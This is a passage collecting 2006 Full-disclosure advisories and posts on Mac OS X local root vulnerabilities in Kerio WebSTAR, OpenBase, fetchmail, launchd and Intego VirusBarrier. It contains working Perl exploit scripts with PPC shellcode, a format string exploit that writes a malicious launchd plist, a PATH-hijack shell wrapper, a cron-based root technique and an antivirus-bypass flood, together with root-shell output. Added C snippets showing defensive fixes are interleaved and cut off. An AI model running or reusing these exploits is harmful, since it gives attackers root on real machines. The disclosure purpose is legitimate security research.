uid=0(root) gid=0(wheel) groups=0(wheel), 81(appserveradm), 79(appserverusr), 
9(procmod), 80(admin)

As mentioned previously you must be in the admin group or be the webstar user 
in order to exploit this issue. If permissions
have been changed other users may be able to elevate their status to root as 
well. 

kevin-finisterres-computer:~ notadmin$ id
uid=505(notadmin) gid=505(notadmin) groups=505(notadmin)
kevin-finisterres-computer:~ notadmin$ /Applications/Kerio\ 
WebSTAR/WebServer/WSWebServer
-bash: /Applications/Kerio WebSTAR/WebServer/WSWebServer: Permission denied
kevin-finisterres-computer:~ notadmin$ /Applications/Kerio\ 
WebSTAR/AdminServer/WSAdminServer
-bash: /Applications/Kerio WebSTAR/AdminServer/WSAdminServer: Permission denied

Workaround:
Kerio has been contacted, fixes will be available soon. In the meantime limit 
access to the admin group and the webstar user. 

Please chmod -s /Applications/Kerio WebSTAR/AdminServer/WSAdminServer and 
/Applications/Kerio WebSTAR/WebServer/WSWebServer

#!/usr/bin/perl
#
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com) 
#
# you must have access to the webstar user or be in the admin group
#
# This is currently not patched... chmod -s your kerio binaries

foreach $key (keys %ENV) {

delete $ENV{$key};

}

$tgts{0} = kerio-webstar-5.4.2-mac.bin - WSAdminServer:/Applications/Kerio 

[Full-disclosure] DMA[2006-1031a] - 'Intego VirusBarrier X4 definition bypass exploit'

2006-11-08 Thread K F (lists)
This was supposed to go out on Halloween but it didn't... but either way 
all you Mac users can get scared or something. OOGA BOOGA!


DMA[2006-1031a] - 'Intego VirusBarrier X4 definition bypass exploit'
Author: Kevin Finisterre
Vendor(s): http://www.intego.com
Product: 'Intego VirusBarrier X4 = VirusBarrierX47070.dmg'
References: 
http://www.digitalmunition.com/DMA[2006-1031a].txt

Description:
Intego VirusBarrier X4 is the simple, fast and non-intrusive antivirus security 
solution for Macintosh computers, by Intego, the 
leading publisher of personal security software for Macintosh. It offers 
thorough protection against viruses of all types, coming 
from infected files or applications, whether on CD-ROMs, DVDs or other 
removable media, or on files downloaded over the Internet 
or other types of networks.

Intego VirusBarrier X4 protects your computer from viruses by constantly 
examining all the files that your computer opens and 
writes, as well as watching for suspicious activity that may be the sign of 
viruses acting on applications or other files. With 
Intego VirusBarrier X4 on your computer, you can rest assured that your 
Macintosh has the best protection available against 
viruses of all kinds.

Although VirusBarrier does a pretty good job of halting malicious activity the 
product currently suffers from a flaw related to the 
amount of alerts that it can process simultaneously. If an attacker is able to 
trigger multiple alerts in succession within a very 
short amount of time he or she may be able to cause VirusBarrier to completely 
ignore positive matches against virus definitions. The
consequences of ignored matches may include full system compromise or further 
spreading of malware.

As an example we will show how VirusBarrier normally stops a local root exploit 
with behavior similar to 'OSX.ExploitMachex.A', then 
we will demonstrate how the VirusBarrier protection can be bypassed by using a 
simple flood of Eicar Test files. 

Any typical attempt to access or execute a file or program that is a match for 
a VirusBarrier definition results in an alert on the
user interface. There is a sweet lookin insulin bottle on the screen that 
slowly empties as the virus nears eradication. 

'excploit' is infected by 'OSX.ExploitMachex.A' What would you like to do 
('Ignore' || 'Repair')? 

Selecting 'Ignore' allows the malicious code to execute as if no AntiVirus 
program existed at all. 

virusbarrier-users-ibook:/tmp virusbarrieruser$ ./excploit 
uid=0(root) gid=0(wheel) groups=0(wheel), 81(appserveradm), 79(appserverusr), 
80(admin)

On the other hand if you chose 'Repair' the process is terminated dead in its 
tracks and the file is nulled out: 

virusbarrier-users-ibook:/tmp virusbarrieruser$ ./excploit 
-bash: ./excploit: Operation not permitted
virusbarrier-users-ibook:/tmp virusbarrieruser$ ls -al excploit 
-rwxr-xr-x   1 virusbar  wheel  0 Oct 31 02:02 excploit

The above output demonstrates how Virusbarrier is supposed to work. Under 
normal circumstances this would be adequate to stop a 
malicious attack. 

If however an attacker floods the file system with dummy virus files at a quick 
rate the VirusBarrier software will promptly stop 
responding after presenting the user with a few audible and visual alerts. 
After about 40 some odd infected files in a row the 
system will become confused and in some cases VirusBarrier may stop responding 
completely. (Intego confirmed a limit of 20 files)

When under attack the user may see dozens of messages on the screen. With our 
example code the messages are similar to the following: 

'0.92815455662033' is infected by 'EICAR Test' What would you like to do ?

From the attacker's standpoint the exploitation is fairly quick and simple. Our 
example uses a local root exploit however this tactic
could easily be applied to any existing malware technique that Intego 
VirusBarrier protects against. Code could in theory be run as a 
precursor to an InqTana attack as a means to bypass the Intego protection. The 
existing signatures for InqTana A B C and D would 
then be completely useless and an E variant would be born. 

virusbarrier-users-ibook:~ virusbarrieruser$ cd ~/Desktop/pwntego
virusbarrier-users-ibook:~/Desktop/pwntego virusbarrieruser$ ls
Pwntego.pl  Pwntego.sh  README.txt  pwntego.uu  rand-eicar.pl
virusbarrier-users-ibook:~/Desktop/pwntego virusbarrieruser$ ./Pwntego.pl 
rm: /tmp/objc_sharing_ppc_92: Permission denied
;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P
;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p
;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p
Injecting pwnacillin shot
;p;P;p;p;p;P;p;p;p;P;p;puid=0(root) gid=0(wheel) groups=0(wheel), 
81(appserveradm), 79(appserverusr), 80(admin)
rm: 

[Full-disclosure] OpenBase SQL multiple vulnerabilities Part Deux

2006-11-07 Thread K F (lists)


DMA[2006-1107a] - 'OpenBase SQL multiple vulnerabilities Part Deux'
Author: Kevin Finisterre
Vendor(s): http://www.openbase.com
Product: 'OpenBase SQL =10.0 (?)'
References: 
http://www.digitalmunition.com/DMA[2006-1107a].txt

Description:
(regurgitation warning - this may taste VERY familiar)

For over a decade, the OpenBase family of products have been enabling some of 
the most innovative business applications 
at work today. With thousands of customers worldwide, OpenBase has become a 
brand that companies can rely on. OpenBase 
customers include ATT, Adobe Systems, Canon, Walt Disney, First National Bank 
of Chicago, MCI, Motorola, Apple, The 
Sharper Image and many other innovators worldwide. 

As mentioned previously several setuid root binaries from OpenBase SQL are 
placed in /Library/OpenBase/bin during the 
installation of WebObjects support for Xcode or during a standard OpenBase 
install. In this particular instance we will
be dealing only with the openexec binary. 

pwnercycles-ibook:/tmp pwnercycle$ ls -al /Library/OpenBase/bin/openexec
-rwsrwsr-x   1 root  admin  189544 Jan 13  2005 /Library/OpenBase/bin/openexec 

The openexec binary makes poor use of its setuid privileges when calling 
various helper binaries such as: cp, rm and killall. 
Each of the mentioned binaries winds up being called while openexec is running 
as root. Using the PATH environment variable 
it is possible to influence openbase in a manner that forces it to call the 
various helper binaries from a location of the 
attacker's choice. Manipulating openexec via its path is an easy way for an 
attacker to obtain root.   

pwnercycles-ibook:/tmp pwnercycle$ ./openexec_duh.pl 

Usage: ./openexec_duh.pl target 

Targets:

0 . cp - /Library/OpenBase/bin/openexec -install
1 . killall - /Library/OpenBase/bin/openexec -kill
2 . rm - /Library/OpenBase/bin/openexec -uninstall

pwnercycles-ibook:/tmp pwnercycle$ ./openexec_duh.pl 1
*** Target: killall - /Library/OpenBase/bin/openexec -kill
/bin/cp /tmp/finisterre /tmp/killall
sh-2.05b# id
uid=0(root) gid=0(wheel) groups=0(wheel), 81(appserveradm), 79(appserverusr), 
80(admin)


The next issue with the openexec binary results in an attacker being able to 
place a root owned and world writable file anywhere on 
the target file system. Again the end result is a local root compromise, in 
this case a little cron nastiness is required. 

When an openexec instance starts a log is written to /tmp/output. Unfortunately 
when this log file is created openexec takes no 
objections to a symlink in place of the filename. A symlink can point to 
virtually anywhere on the filesystem so an attacker has many 
options at his disposal. In most cases being able to create a file alone will 
not get you root access. The proper umask and a crafty 
file location can make all the difference in the world in some instances. 

Having the ability to place a root owned file with rw-rw-rw- permissions 
anywhere on the filesystem is quite powerful. On Linux based 
systems writing to /etc/ld.so.preload has proven to be a reliable exploitation 
path to obtain root. Apple's OSX unfortunately has no 
such facility to abuse. After some research the most expedient way I could come 
up with to obtain root via rw-rw-rw- file creation was 
cron abuse.   

On a vanilla install of OSX there are no tabs in /var/cron/tabs, nor is cron 
even running. In order to exploit the cron facilities we
must have the cron daemon running. Fortunately the crontab -e command kicks off 
/usr/sbin/cron after a valid crontab is saved. 

pwnercycles-ibook:/tmp pwnercycle$ ps -ax | grep cron 
 2340  p4  R+ 0:00.00 grep cron
pwnercycles-ibook:/tmp pwnercycle$ ls /var/cron/tabs/
pwnercycles-ibook:/tmp pwnercycle$ crontab -e 
crontab: no crontab for kf - using an empty one
crontab: installing new crontab
pwnercycles-ibook:/tmp pwnercycle$ ps -ax | grep cron 
 2344  ??  Ss 0:00.01 /usr/sbin/cron
 2346  p4  R+ 0:00.00 grep cron
pwnercycles-ibook:/tmp pwnercycle$ ls /var/cron/tabs/
pwnercycle

According to the man page 'cron checks each minute to see if its spool 
directory's modtime (or the modtime on /etc/crontab) has changed, 
and if it has, cron will then examine the modtime on all crontabs and reload 
those which have changed.  Thus cron need not be restarted 
whenever a crontab file is modified'.

Wow how perfect is that! 1.) crontab -e to start cron 2.) create 
/var/cron/tabs/root 3.) wait 1 minute 4.) enjoy root shell.

pwnercycles-ibook:/tmp pwnercycle$ ./openexec_createfile.pl 


Usage: ./openexec_createfile.pl target 

Targets:

0 . OpenBase10.0.0_MacOSX.dmg

pwnercycles-ibook:/tmp pwnercycle$ ./openexec_createfile.pl 0
*** Target: OpenBase10.0.0_MacOSX.dmg /Library/OpenBase/bin/openexec
deactivating OpenBase Service

No matching processes belonging to you were found
No matching processes belonging to you were found
No matching processes belonging to you were found
/var/cron/tabs/root should 
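The predictable /tmp/output log described above is the classic symlink-following file creation bug. As an added example (not code from the advisory or from OpenBase), the C below contrasts the open() flags that follow a planted link with a hardened variant and reproduces the scenario in a scratch directory as an ordinary user; the /tmp/symlink-demo-XXXXXX directory and the "output"/"victim" names are constructed for the demo.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* The pattern the advisory describes: a privileged process opens a fixed,
 * predictable name in a world-writable directory with O_CREAT and nothing
 * that stops it from following a symlink. If a local user has planted
 * "path" as a link, the link target is created or truncated with the
 * process's ownership and whatever mode the umask leaves. */
int open_log_unsafe(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0666);
}

/* Hardened variant: never follow a symlink, never reuse a pre-existing
 * name, and set the mode explicitly instead of trusting the umask.
 * Returns -1 with errno set (EEXIST, or ELOOP on some systems) when a
 * planted link or file is in the way. Keeping the log out of a shared
 * directory altogether is the other half of the fix. */
int open_log_safe(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Reproduce the attack in a scratch directory: plant "output" as a symlink
 * to "victim", then try both opens. Sets *unsafe_created_target to 1 if the
 * unsafe open created the link target, and *safe_errno to the errno the
 * hardened open failed with (0 if it unexpectedly succeeded). Returns 1
 * when the unsafe open was fooled and the safe one refused, 0 otherwise,
 * -1 on setup failure. */
int demo_planted_symlink(int *unsafe_created_target, int *safe_errno)
{
    char dir[] = "/tmp/symlink-demo-XXXXXX";   /* constructed scratch dir */
    char link[512], target[512];
    struct stat st;
    int fd, fooled;

    *unsafe_created_target = 0;
    *safe_errno = 0;
    if (mkdtemp(dir) == NULL)
        return -1;
    snprintf(link, sizeof link, "%s/output", dir);
    snprintf(target, sizeof target, "%s/victim", dir);

    /* the local user plants the link before the privileged program runs */
    if (symlink(target, link) != 0)
        return -1;

    fd = open_log_unsafe(link);
    *unsafe_created_target = (fd >= 0 && stat(target, &st) == 0);
    if (fd >= 0)
        close(fd);
    unlink(target);          /* leave only the (now dangling) link behind */

    fd = open_log_safe(link);
    *safe_errno = (fd < 0) ? errno : 0;
    if (fd >= 0)
        close(fd);

    fooled = (*unsafe_created_target && *safe_errno != 0);
    unlink(link);
    rmdir(dir);
    return fooled;
}

int main(void)
{
    int created, err;
    int r = demo_planted_symlink(&created, &err);
    printf("unsafe open created the link target: %d\n", created);
    printf("safe open failed with: %s\n", err ? strerror(err) : "(did not fail)");
    return r == 1 ? 0 : 1;
}
```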

[Full-disclosure] Machoman / Macarena virus for OSX

2006-11-06 Thread K F (lists)
Since most of the reporting out on OSX.Macerena is fairly minimal I thought I 
would point everyone to the original tutorial and PoC code by Roy G Biv of 29A 
in case you missed it. 

http://vx.netlux.org/lib/vrg01.html

-KF





[Full-disclosure] hack.lu Bluetooth demo

2006-10-23 Thread K F (lists)
As requested by several of the folks that went to hack.lu - 2006 I have 
posted the code for the 'GenerationTwo' InqTana variant at
http://www.digitalmunition.com/hacklu.html

For those that missed it Thierry Zoller of nruns demonstrated a remote 
exploitation of CVE-2005-1333 as a means to compromise both a Bluetooth 
enabled 10.3.9 Macintosh (that has not been patched to 
APPLE-SA-2005-03-21 and APPLE-SA-2005-05-03) and anything that it was 
paired with. The variant also works on 10.4 machines that have not been 
patched with the Mac OS X 10.4.1 and Mac OS X 10.4.7 Updates.

Post-compromise the 'GenerationTwo' variant installs a malicious 
/etc/ttys file with a login getty listening on a Bluetooth rfcomm 
channel. A user is added and a setuid backdoor is left behind for easy 
root access over a Bluetooth rfcomm connection. The final steps of 
exploitation involve the harvesting of any available link keys (via 
KeyHarvest.pl) from blued.plist so that other devices may also be 
exploited.

Much thanks to both Thierry Zoller and the organizers of Hack.lu.

If you have any questions about GenerationTwo feel free to ask. Please 
keep in mind that CVE-2005-1333 was patched almost one and a half years 
ago at this point so I would say that you SHOULD be patched to this by 
now. If you are pen-testing older Macs make sure you check for Bluetooth!
-KF





Re: [Full-disclosure] HP Tru64 dtmail bug - Really exploitable?

2006-10-22 Thread K F (lists)
Where were the politics? I was simply stating the facts.
-KF

 Politics should be avoided at all costs.
   



Re: [Full-disclosure] NETRAGARD-20060624 SECURITY ADVISORY] [ROXIO TOAST 7 TITANIUM - LOCAL ROOT COMPROMISE ]

2006-08-22 Thread K F (lists)

Propaganda Support wrote:


On Aug 22, 2006, at 3:22 PM, K F wrote:


the admin users on OS X can NOT become root at any time.


Yes, they can.


Um NO they can't. ANY is a pretty strong word.




The admin user must first know the admin password before becoming root.


Obviously. An admin user who doesn't know the admin password is not an 
admin user. He/she is a different user using an admin user's account.
You just validated my point... without the admin password an admin user 
can not become root. Thus they can not 'become root at any time'. A 
person who has access to an admin session may not become root until the 
admin password becomes known.


I am physically sitting on a mac that I do not know the admin password 
to right now... when I typed 'id' it says I am in the admin group... 
therefore I am an admin, period, regardless of whether I know the password; my 
gid=admin. If you want to get trivial over wording that is fine... 
bottom line is, while sitting at someone else's terminal that is logged in 
as admin you too are an admin as far as the OS is concerned.


Based on the info below ANYONE that sits down at your pc while it is 
logged in can take advantage of the fact that you can take root 
WITHOUT a password using the technique outlined below.


Not true. They must provide an admin password to use the Deja Vu pref 
pane, unless the admin user chose to leave it unlocked. (It's locked 
by default.)

Well guess what... when you go to add a user account in System 
Preferences it asks you to unlock the panel. When you are done it locks 
it back for you. The next time you open System Preferences it is again 
locked and it wants a password... guess what Deja Vu does not do that. 
You unlock DejaVu it stays unlocked...


Guess what that means the first time you sat down to use Dejavu and 
you clicked the little lock to make your changes... unless you 
explicitly locked it back (which being accustomed to OSX locking items 
back for you why would you?) you are now sitting with an unlocked Deja 
Vu panel.


Thanks for helping isolate some of the actual issue.
DejaVu does not re-lock control panel items unless explicitly told to do so



Don't act like you have never let someone use a web browser or log 
into instant messenger on your computer before...


I don't have to act like it, because I don't unless I trust the person 
completely. I have a guest account for anyone else.


If you let people that you don't trust use your logged in admin 
account, you're asking for all kinds of trouble, whether or not you 
have Deja Vu installed. They could delete any/all folders within your 
Home folder, for example.

Does it make a difference if it is someone that I DO trust? I trust my 
girlfriend... that does not mean I want her taking root on my Mac.


I am also curious to know if anyone knows how to spoof the presence of 
the System Preferences window...


I can run the binaries just fine as a normal user however there is some 
sort of check for the Preference Pane to actually be running. I wonder 
if a spoof could be used to bypass the need to actually unlock DejaVu.


k-fs-computer-2:/Library/PreferencePanes/DejaVu.prefPane/Contents/Resources 
kf$ ./install_scripts


This tool can only be run from within the Deja Vu preference pane.


-KF




[Full-disclosure] DMA[2006-0801a] - 'Apple OSX fetchmail buffer overflow'

2006-08-01 Thread K F (lists)


DMA[2006-0801a] - 'Apple OSX fetchmail buffer overflow'
Author: Kevin Finisterre
Vendor: http://www.apple.com/
Product: 'Mac OSX =10.4.7'
References: 
http://www.digitalmunition.com/DMA[2006-0801a].txt
http://www.digitalmunition.com/getpwnedmail-x86.pl
http://www.digitalmunition.com/getpwnedmail-ppc.pl
http://www.freebsd.org/cgi/query-pr.cgi?pr=83805
http://fetchmail.berlios.de/fetchmail-SA-2005-01.txt
http://www.securityfocus.com/bid/14349

Description:
fetchmail-SA-2005-01 states that 'In fetchmail-6.2.5 and older, very long UIDs 
can cause fetchmail to crash, or potentially make it execute code placed on the 
stack. In some configurations, fetchmail is run by the root user to download 
mail for multiple accounts.' The authors of fetchmail made patches for these 
issues available to the public on 2005-07-21.

In defiance of a 'very proactive approach to security' Apple's OSX remained 
unpatched for approximately one year after the vendor supplied patches were 
made available. Shortly after the vendor disclosure of this bug exploits were 
made available by The Mantis Project ([EMAIL PROTECTED]). Coincidentally a 
recent paper was written about exploiting buffer overflows and this 
vulnerability was used as an example: 
http://packetstormsecurity.org/papers/attack/payload-rewrite_exploit.txt

As you may have guessed by now exploitation on OSX is fairly trivial for both 
PowerPC and x86 platforms. An attacker with local access can gain gid=6 (mail) 
and a remote attacker may gain root under certain conditions. 

k-fs-computer:~ kf$ ls *pwnedmail*
getpwnedmail-ppc.pl getpwnedmail-x86.pl

On PowerPC things were pretty straightforward. Simply overwriting the $pc and 
$lr registers with the address of our stack based shellcode was enough to snag 
egid=6. On x86 we obviously have to deal with the NX based protection. As shown 
plenty of times in the past a non executable stack by itself is pretty useless. 
We can overwrite the $eip register with the address of system() and we are 
pretty much good to go. A small wrapper in /tmp can help finish the job and 
give us a shell with gid=6.  

k-fs-computer:~ kfinisterre$ /usr/bin/fetchmail -p pop3 --fastuidl 1 localhost 
-P 1234
Enter password for [EMAIL PROTECTED]: 
sh-2.05b$ id
uid=501(kf) gid=501(kf) egid=6(mail) groups=6(mail), 81(appserveradm), 
79(appserverusr), 80(admin)

In some cases fetchmail is run by the root user so it may be possible to take 
remote root with this vulnerability under certain circumstances. 

As a side note a previously undisclosed local vulnerability in fetchmail was 
discovered while documenting the above mentioned issue. Fetchmail no longer 
ships in a setgid() configuration so this information should be of minimal 
impact. It is worth noting since it may impact non OSX machines in a similar 
manner. 

k-fs-computer:~ kf$ export PATH=/tmp/:$PATH 
k-fs-computer:~ kf$ cat  /tmp/uname
/usr/bin/id
/bin/sh -i
k-fs-computer:~ kf$ chmod +x /tmp/uname
k-fs-computer:~ kf$ /usr/bin/fetchmail -V
This is fetchmail release 6.2.5+IMAP-GSS+SSL+INET6
Fallback MDA: (none)
uid=501(kf) gid=501(kf) egid=6(mail) groups=6(mail), 81(appserveradm), 
79(appserverusr), 80(admin)
sh-2.05b$

This issue is caused by the following code snippet: 

if (versioninfo)
{
...
/* this is an attempt to help remote debugging */
system("uname -a");
}

Both of the above problems are addressed by the latest Apple update. 

Work Around: 
Install the 2006-004 update
http://docs.info.apple.com/article.html?artnum=106704
http://docs.info.apple.com/article.html?artnum=61798
http://www.apple.com/support/downloads/

#!/usr/bin/perl
# getpwnedmail.pl
#
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com) 
#
# This is a canibalized version of Kansas City POP Daemon Version 0.0 - 
Copyright (c) 1999 David Nicol [EMAIL PROTECTED]
#
# kevin-finisterres-mac-mini:~ kfinisterre$ /usr/bin/fetchmail -p pop3 
--fastuidl 1 localhost -P 1234
# Enter password for [EMAIL PROTECTED]: 
# sh-2.05b$ id
# uid=501(kfinisterre) gid=501(kfinisterre) egid=6(mail) groups=6(mail), 
81(appserveradm), 79(appserverusr), 80(admin)
#
# http://docs.info.apple.com/article.html?artnum=106704

use Socket;
use IO::Handle;
use IO::Socket;

$banner = fetchmail ppc exploit - OSX 10.4.7 8J135;
$sc =  x 10 . 
# * PPC MacOS X shellcode
# * ghandi [EMAIL PROTECTED]
  \x7c\xa5\x2a\x79  . # /* xor.   r5, r5, r5; r5 = NULL   */
  \x40\xa2\xff\xfd  . # /* bnel   shellcode   */
  \x7f\xe8\x02\xa6  . # /* mflr   r31 */
  \x3b\xff\x01\x30  . # /* addi   r31, r31, 268+36*/ 
  \x38\x7f\xfe\xf4  . # /* addi   r3, r31, -268 ; r3 = path   */
  \x90\x61\xff\xf8  . # /* stwr3, -8(r1); argv[0] = path  */
  \x90\xa1\xff\xfc  . # /* stwr5, -4(r1); argv[1] = NULL  */
  \x38\x81\xff\xf8  . # /* subi   r4, r1, 8 ; r4 = {path, 0}  */
  
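The system("uname -a") snippet above and openexec's cp/rm/killall calls in the earlier advisory share one root cause: a privileged program lets the caller's PATH decide which binary gets run. As an added example, not code from the advisory or from fetchmail, the C below resolves helpers only from a fixed trusted list and execs them directly with a scrubbed environment; the TRUSTED_DIRS list and the function names are this example's own choices.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* The only places a privileged program will look for helpers. The caller's
 * PATH and the current directory are deliberately never consulted. */
static const char *const TRUSTED_DIRS[] = {
    "/usr/bin", "/bin", "/usr/sbin", "/sbin", NULL
};

/* Resolve a bare helper name ("uname", "killall", "cp") to an absolute path
 * under TRUSTED_DIRS. Names containing '/' are rejected outright so that
 * "../tmp/uname" or "./cp" cannot be smuggled in. Returns 0 and fills out,
 * or -1 if the helper is not found in any trusted directory. */
int resolve_trusted_helper(const char *name, char *out, size_t outlen)
{
    if (name == NULL || *name == '\0' || strchr(name, '/') != NULL)
        return -1;
    for (size_t i = 0; TRUSTED_DIRS[i] != NULL; i++) {
        int n = snprintf(out, outlen, "%s/%s", TRUSTED_DIRS[i], name);
        if (n < 0 || (size_t)n >= outlen)
            return -1;
        if (access(out, X_OK) == 0)   /* existence check only; execve decides */
            return 0;
    }
    return -1;
}

/* Environment handed to the child: a fixed PATH and nothing inherited, so
 * the caller's PATH, LD_LIBRARY_PATH, DYLD_* and IFS never reach it. */
char *const *clean_env(void)
{
    static char *const env[] = { "PATH=/usr/bin:/bin", NULL };
    return env;
}

/* What the advisory's snippet does: the string goes to /bin/sh, which walks
 * the caller's PATH to find "uname". With PATH=/tmp:... that is /tmp/uname.
 * Kept only as the "before" for comparison; never called below. */
int run_helper_unsafe(void)
{
    return system("uname -a");
}

/* The "after": resolve to an absolute trusted path, exec it directly (no
 * shell, no PATH search) with a scrubbed environment, and return the child's
 * exit status, or -1 on failure. args is a NULL-terminated list of extra
 * arguments and may be NULL. */
int run_helper_safe(const char *name, char *const args[])
{
    char path[4096];
    char *argv[32];
    int n = 0, status = 0;
    pid_t pid;

    if (resolve_trusted_helper(name, path, sizeof path) != 0)
        return -1;
    argv[n++] = path;
    for (int i = 0; args != NULL && args[i] != NULL && n < 31; i++)
        argv[n++] = args[i];
    argv[n] = NULL;

    pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(path, argv, clean_env());
        _exit(127);                      /* exec failed */
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    char path[4096];
    char *args[] = { "-s", NULL };

    /* Even with PATH pointing at /tmp first, the helper comes from a trusted dir. */
    setenv("PATH", "/tmp:/usr/bin:/bin", 1);
    if (resolve_trusted_helper("uname", path, sizeof path) == 0)
        printf("uname resolved to %s\n", path);
    printf("resolve \"../tmp/uname\": %d\n",
           resolve_trusted_helper("../tmp/uname", path, sizeof path));
    printf("run_helper_safe(uname -s) exit status: %d\n",
           run_helper_safe("uname", args));
    return 0;
}
```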

Re: [Full-disclosure] Roxio Contact

2006-07-24 Thread K F (lists)
You may try requesting to speak to someone from the Software Development 
/ Engineering team... I am sure you already know about going round and 
round in an organization looking for a contact.

-KF


Simon Smith wrote:

Does anyone have any contact information for Roxio? I called their
technical support team and they had no idea who to submit vulnerability
information to.

--

Regards, 
Adriel T. Desautels

SNOsoft Research Team

--
Vulnerability Research and Exploit Development









  




Re: [Full-disclosure] DMA[2006-0628a] - 'Apple OSX launchd unformatted syslog() vulnerability'

2006-06-30 Thread K F (lists)

Just so no one feels left out...


-KF
#!/usr/bin/perl
#
# http://www.digitalmunition.com/FailureToLaunch-ppc.pl
# Code by Kevin Finisterre kf_lists[at]digitalmunition[dot]com
#
# Much appreciation goes to John H for all kindsa random shit like exploiting 
Veritas and other random things in the past
#
# core... where the hell are you fool. 
#
# This is just a vanilla format string exploit for OSX on ppc. We overwrite a 
saved return addy with our shellcode address.
# This code currently overwrites a saved return addy with the stack location of 
our seteuid() / execve() shellcode.
#
# This exploit will create a malicious .plist file for you to use with launchctl
# kevin-finisterres-mac-mini:~ kfinisterre$ launchctl load ./com.pwnage.plist
#
# In theory I guess you could also drop this in ~/Library/LaunchAgents
# 
# This was tested against OSX 10.4.6 8l127 on a 1.25GHz PowerPC G4 and a
# 500mhz PowerPC G3 running 10.4 8A428
# 
# kevin-finisterres-mac-mini:~ kfinisterre$ ls -al /sbin/launchd
# -rwsr-sr-x   1 root  wheel  80328 Feb 19 04:09 /sbin/launchd
# kevin-finisterres-mac-mini:~ kfinisterre$ file /sbin/launchd
# /sbin/launchd: setuid setgid Mach-O executable ppc
#
# ./src/SystemStarter.c:374:  syslog(level, buf);
#
# 
http://developer.apple.com/documentation/Security/Conceptual/SecureCodingGuide/Articles/AccessControl.html
# Because launchd is a critical system component, it receives a lot of peer 
review by in-house developers at Apple. 
#  It is less likely to contain security vulnerabilities than most production 
code.
# 

foreach $key (keys %ENV) {

delete $ENV{$key};

}

#// ppc execve() code by b-r00t + nemo to add seteuid(0)
$sc = 
\x7c\x63\x1a\x79 . 
\x40\x82\xff\xfd . 
\x39\x40\x01\xc3 . 
\x38\x0a\xfe\xf4 . 
\x44\xff\xff\x02 . 
\x39\x40\x01\x23 . 
\x38\x0a\xfe\xf4 . 
\x44\xff\xff\x02 .
\x60\x60\x60\x60 . 
\x7c\xa5\x2a\x79\x40\x82\xff\xfd . 
\x7d\x68\x02\xa6\x3b\xeb\x01\x70 .
\x39\x40\x01\x70\x39\x1f\xfe\xcf .
\x7c\xa8\x29\xae\x38\x7f\xfe\xc8 .
\x90\x61\xff\xf8\x90\xa1\xff\xfc .
\x38\x81\xff\xf8\x38\x0a\xfe\xcb .
\x44\xff\xff\x02\x7c\xa3\x2b\x78 .
\x38\x0a\xfe\x91\x44\xff\xff\x02 .
\x2f\x74\x6d\x70\x2f\x73\x68\x58;

$writeaddr = 0xbcf8; # Saved Return addy from frame 3 
$ENV{TERM_PROGRAM} = - . pack('l', $writeaddr) . pack('l', $writeaddr+2) . 
 x 1 . $sc ;

$format =   
# make it more robust yourself... I'm lazy
# 0xbfff fe70
% . 0xbfff . d%112\$hn .
% . 0x3ed9 . d%113\$hn ;

open(SUSH,/tmp/aaa.c);
printf SUSH int main(){seteuid(0);setuid(0);setgid(0);system(\/bin/sh\);}\n;
system(PATH=$PATH:/usr/bin/ cc -o /tmp/sh /tmp/aaa.c);

open(PWNED,com.pwnage.plist);   

print PWNED ?xml version=\1.0\ encoding=\UTF-8\?
!DOCTYPE plist PUBLIC \-//Apple Computer//DTD PLIST 1.0//EN\ 
\http://www.apple.com/DTDs/PropertyList-1.0.dtd\;
plist version=\1.0\
dict
keyLabel/key
string . $format .
/string
keyProgramArguments/key
array
stringhttp://www.digitalmunition.com/string
/array
keyRunAtLoad/key
true/
/dict
/plist\n;
close(PWNED);
print open a new window and type - \launchctl load ./com.pwnage.plist\\n;
system(/sbin/launchd);
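The comment `syslog(level, buf);` in the script above is the whole bug: caller-controlled data is passed as the format argument. As an added example that is not the advisory's code, the C below reproduces the two call shapes over snprintf() (so the effect is visible without a syslog daemon) and adds a small check that flags inputs carrying conversions, usable when auditing log call sites or the strings fed to them; the function names and the sample label are this example's own.

```c
#include <stdio.h>
#include <string.h>

/* The shape the advisory points at in SystemStarter.c:
 *     syslog(level, buf);
 * buf is caller data but is used as the format string, so every '%'
 * sequence in it is interpreted by the printf engine. Reimplemented over
 * snprintf() so the effect can be observed in a plain buffer. */
int log_unformatted(char *out, size_t outlen, const char *user_buf)
{
    return snprintf(out, outlen, user_buf);      /* user data as format: bug */
}

/* The fix: the format is a literal and the user data is only an argument. */
int log_formatted(char *out, size_t outlen, const char *user_buf)
{
    return snprintf(out, outlen, "%s", user_buf);
}

/* Returns 1 if s contains a '%' that would be treated as a conversion
 * (anything other than the escaped "%%"), 0 otherwise. Useful as a
 * pre-check on strings about to reach a format parameter, or as a
 * predicate when scanning inputs such as launchd Labels. */
int has_format_directive(const char *s)
{
    for (const char *p = s; *p != '\0'; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {      /* "%%" is a literal percent sign */
            p++;
            continue;
        }
        return 1;               /* "%n", "%x", "%112$hn", a trailing '%', ... */
    }
    return 0;
}

int main(void)
{
    /* Constructed input: the harmless "%%" is enough to see the difference.
     * Inputs with %n or %x are deliberately not fed to the unsafe call:
     * with no matching argument that is undefined behaviour. */
    const char *label = "progress 100%% done";
    char out[128];

    log_unformatted(out, sizeof out, label);
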